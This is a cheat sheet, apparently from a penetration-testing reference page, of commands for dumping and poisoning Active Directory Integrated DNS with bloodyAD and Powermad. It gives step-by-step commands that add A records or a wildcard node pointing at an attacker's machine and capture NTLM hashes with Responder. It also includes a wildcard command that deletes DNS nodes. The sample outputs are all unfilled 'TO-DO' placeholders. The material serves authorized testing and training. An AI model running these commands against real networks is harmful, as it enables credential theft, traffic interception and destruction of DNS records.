Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Basic
1. DNS Dump
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> get dnsDump
Sample Output:
TO-DO# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> get dnsDump
Sample Output:
TO-DO# Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> get dnsDump
Sample Output:
TO-DO1. Import Module
. .\Powermad.ps1
Sample Output:
TO-DO2. Enum
# Get ADIDNS Zone
Get-ADIDNSZone
Sample Output:
TO-DO# Get ADIDNS Permissions
Get-ADIDNSPermission
Sample Output:
TO-DO# Remove a Node
Remove-ADIDNSNode -Node *
Sample Output:
TO-DOAbuse #1: ADIDNS Poisoning
1. Add a New A Record
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add dnsRecord <SUBDOMAIN> <LOCAL_IP>
Sample Output:
TO-DO# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add dnsRecord <SUBDOMAIN> <LOCAL_IP>
Sample Output:
TO-DO# Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> add dnsRecord <SUBDOMAIN> <LOCAL_IP>
Sample Output:
TO-DO2. Steal NTLM
sudo responder -I tun0
Sample Output:
TO-DO1. Import Module
. .\Powermad.ps1
Sample Output:
TO-DO2. Create a New Node
$dnsRecord = New-DNSRecordArray -Type A -Data <LOCAL_IP>
Sample Output:
TO-DONew-ADIDNSNode -Node * -Tombstone -DNSRecord $dnsRecord -Verbose
Sample Output:
TO-DO3. Check
Resolve-DnsName DoesNotExist
Sample Output:
TO-DO4. Steal NTLM
sudo responder -I tun0
Sample Output:
TO-DO